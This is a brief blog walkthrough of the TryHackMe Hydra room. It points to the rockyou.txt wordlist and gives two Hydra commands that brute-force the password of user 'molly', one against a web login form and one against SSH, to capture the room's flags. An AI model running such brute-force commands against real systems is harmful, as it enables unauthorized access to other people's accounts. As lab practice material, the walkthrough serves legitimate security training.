Brute-forcing passwords with Hydra


In this article you will find the solutions for the Hydra room on Try Hack Me.


Almost every bruteforcing or cracking task from HackTheBox/TryHackMe uses the rockyou.txt wordlist. You can google it and download it, if you can’t find it in your Kali distro under the path /usr/share/wordlists/rockyou.txt.gz

If you’re using Kali then you have Hydra already installed, all you have to do is run two commands:

Flag 1

Run the following command, the password should be cracked in less than one minute.

root@kali:~/Desktop# hydra -l molly -P rockyou.txt http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V

Flag 2

Start bruteforcing the ssh password then logon via ssh as molly to grab the flag.

root@kali:~/Desktop# hydra -l molly -P rockyou.txt -t 4 ssh

Thanks for reading!

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.